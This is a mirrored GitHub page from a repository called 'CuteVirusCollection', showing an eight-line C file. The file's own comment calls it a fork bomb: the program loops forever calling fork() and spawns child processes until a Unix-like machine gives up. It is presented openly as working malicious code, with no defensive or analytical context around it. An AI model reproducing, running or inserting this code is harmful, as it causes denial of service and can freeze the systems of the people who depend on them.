mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 07:40:43 -08:00
8 lines
158 B
C
8 lines
158 B
C
// A fork-bomb that creates lots of child process till the computer gives up. Works on Unix-like OS.
|
|
|
|
#include <unistd.h>
|
|
|
|
int main(){
|
|
while(1) fork();
|
|
}
|